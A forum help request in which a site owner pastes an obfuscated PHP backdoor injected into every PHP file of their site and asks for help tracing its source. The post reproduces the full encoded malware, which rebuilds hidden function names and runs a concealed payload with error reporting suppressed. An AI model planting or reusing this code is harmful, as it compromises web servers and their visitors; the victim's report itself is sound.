Help Needed
-
Hi dear team.
We got this type of malware, this peace of code was added to every php file –
<?php $zlerqbhc = ‘3]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!)!gj!|!*1?hmg%)!gj!<**2-4-bubE{ofuopd
ufh
fmjg}[;ldpt%}K;ufldpt}X;
ms;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c6<!%ff2!>!bssbz) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyfx x22l:!}V;3q%}U;y]}R;2]7;!}6;##}C;!>>!}W;utpi}Y;tu!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmgM5]DgP5]D6#<%fdy>#]D4]27%)uqpuft
msvd},;uqpuftmsvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x748y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]585:6197g:74985-rr.93e:5597f-s.973:A x27pd%6<pd%w6Z6<.4
hA x27pd%6<pd%w6Z6<.3hA x27pd%6<pd%w},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%hsbq%)323ldfidk!~!<**qvd}R;*msv%)}.;
UQPMSVD!-idx24- x24<%j,,*!| x24- x24gvodujpo! x24- x24y7 e:4:|:**#ppde#)tutjyf4 x223}!+!<+{e%+*!*+fepdfe{h+{7y]37]88y]27]28y]#/r%/h%)n%-#+I#)e>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27!hmg%qjA)qj3hopmA x273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#tjw/ x24)% x24- x24y4 x24- x24]y8 x24- x24]26 ($_SERVER[" x48 124 x54 120 x5f 125 x53 105 x52 137 x41 10%7**^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6<.msv:.2^,%b:<!%c:>%s: x5c%j:^<!%w
x5c^>Ew:Qb:Qc:W~!%z%)!gj!~<ofmy%,3,j%>j%!<**3x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2{6:!}*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6
ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5{66~6<]K4]65]D8]86]y31]278]y3f]2>j%!|!*#91y]c9y]g2y]#>>*4-7f_*#ujojRk3
{666~6<&w6< judovg<~ x24<!%o:!>! x242178}527}88:}334}472 x24I&b%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opop%!-uyfu%)3of)fepdof57ftidsb
bj+upcotn+qsvmt+fmhpph#)zbscB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i {h%)j{hnpd!opjudovg!|!**#j{hnpd#)tut83:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#d/#)rrd/#00;quui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x2yf x27*&7-n%)utjm6< x7fw6*CW&)7gd%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbu7 x45 116 x54″]); if ((strstr($uas,” x6d 163 x69 145″)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:569,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j7)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobsun>qp%x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!%t72]48y]#>m%:|:*r%:-t%)3of:op#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!|!*nb!>!%tdz)%bbT-%bT-%hW~%#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-7&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4
{6~6<tfs%w6< x7fw6*CWtfsc1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw256]y81]265]y72]254]y76#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5h3]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#np1-bubE{h%)sutcvt)!gj!|!*bubE x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOS%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cqs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf
439275tJGB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7gj6<**2qj%)hopm3}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:, $ehdgdom = implode(array_map("pvusfs27&6<*rfs%7-K)fujsxX6<#o]o]Y%<*QDU
MPT7-NBFSUTLDPT7-UFO)) or (strstr($uas," x72 166 x3a 61 x31")) or (strst]D6M7]K3#<%yy>#]D6]281L1#/##C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]y38#-!%w:**<")57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.l} x27;%!<*#}_;#)323lmw!>!#]y84]275]y83]273]y76]277#<!usfsj($n){return chr(or7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]6dfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvuf6Z6<.2
hA x27pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqdovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|sb!-#}#)fepmqnj!/!#0#)idubnhfsq)!sp!*#ojneb#-*f%)r($uas," x61 156 x64&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x2tfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppdfdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]25d816:+946:ce44#)zbssftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvuif((function_exists(" x6f 142 x5f 163 x74 141 x72 164- x24tvctus)% x24- x24b78]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]38w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%1]211M5]67]452]88]5]48]32M3]317]445]212]445]4%bss x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:NmfV x7f<*XAZASV<*w%)ppdd($n)-1);} @error_reporting(0);]D2P4]D6#<%G]y6d]281Ldz-1H*WCw*[!%rN}#QwTW%hIr x58399#-!#65egb2dc#*<!sfuvso!sb1 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; function pv<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f%)7gj6<*id%)ftpmdR6<*id%)dfyfRVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut><##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:759oepn)%epnbss-%rxW~!Ypp2)%));$mbmlllf = $esnyokx("", $ehdgdom); $mbmlllf();}}7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<j",str_split("%tjw!>!#]y84]275]y83]248]y83]j6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C xx5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr) 162 x6f 151 x64"))) { $esnyokx = " x63 162 x65 14t
cpV x7f x7f x7f x7f<u%V x27{ftmfV x7f<*X&Z&S{fth%)sutcvt)esp>hmg%!<1″) && (!isset($GLOBALS[” x61 156 x75 1q%:>:r%:|:**t%)m%=*h%)m%):fmjix:b!>!ssbnpe_GMFTQIQ&f_UTPI
QUUI&e_SEEBFUPNFS&d_S8297f:5297e:56-xr.985:52985-t.98f;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf
opjujyfopjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Zfs!~<3,j%>j%!*3! x27bc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5/!**#sfmcnbs+yfeobz+sfwjFSFGFS
QUUI&c_UOFHBSFTV
QUU56 x61″])))) { $GLOBALS[” x61 156 x75 156 x61″]=1; $uas=strtolower%z>3<!fmtf!%z>2<!%ww2)%wTW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-zB%z>! x24/%tmw/ x24)%zW%h>EzH,2W%wN;#-EcSFWSFT
%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSiddlkhtu’; $yewvasnw=explode(chr((375-255)),substr($zlerqbhc,(38864-32938),(223-189))); $dajstlnv = $yewvasnw[0]($yewvasnw[(7-6)]); $aoplzhs = $yewvasnw[0]($yewvasnw[(8-6)]); if (!function_exists(‘ywvybrjs’)) { function ywvybrjs($pnfoabgofn, $zyxuph,$jberlvbk) { $zpckzk = NULL; for($nhkaxzyw=0;$nhkaxzyw<(sizeof($pnfoabgofn)/2);$nhkaxzyw++) { $zpckzk .= substr($zyxuph, $pnfoabgofn[($nhkaxzyw*2)],$pnfoabgofn[($nhkaxzyw*2)+(7-6)]); } return $jberlvbk(chr((52-43)),chr((490-398)),$zpckzk); }; } $kaaimrq = explode(chr((142-98)),’4112,53,5327,38,5695,66,1279,58,2120,53,3339,52,3878,20,5207,50,4545,59,3593,23,4436,31,3246,37,5067,43,2693,66,699,58,3727,64,2021,32,5110,61,3283,29,5010,57,1516,45,3312,27,3136,60,1166,67,3045,41,1337,55,1561,43,3898,40,2577,65,4729,30,2887,52,4759,45,1656,25,1468,48,386,27,82,39,911,26,553,63,5478,61,3791,37,4067,45,5584,20,4804,39,467,62,1442,26,1110,56,51,31,5306,21,1629,27,2859,28,1874,36,5539,45,4604,67,2822,37,1964,57,2264,57,3003,42,5643,24,1792,32,3828,50,4671,58,4046,21,5397,49,5667,28,1729,38,2467,48,890,21,1767,25,5604,39,5871,55,3539,21,3683,44,3086,50,3938,61,983,52,2053,67,5257,49,4413,23,1068,42,3482,57,325,61,757,66,121,41,2383,56,3560,33,2939,64,3616,67,1035,33,5365,32,4843,49,616,49,2439,28,1681,48,211,67,4165,23,413,54,1233,46,937,46,2321,62,4253,62,1824,50,5171,36,162,49,4516,29,4934,25,5831,40,4489,27,2642,51,2173,52,665,34,5446,32,1604,25,4892,42,1910,54,3391,27,529,24,2759,63,4467,22,823,67,2515,22,3999,47,4188,65,4315,45,0,30,30,21,4360,53,3196,50,2225,39,1392,50,278,47,5761,70,2537,40,3418,64,4959,51′); $svvzia = $dajstlnv(“”,ywvybrjs($kaaimrq,$zlerqbhc,$aoplzhs)); $dajstlnv=$zlerqbhc; $svvzia(“”); $svvzia=(376-255); $zlerqbhc=$svvzia-1; ?>We don’t know what is this.
Can someone help us to find from where come this malware.
Thanks in advance.
- The topic ‘Help Needed’ is closed to new replies.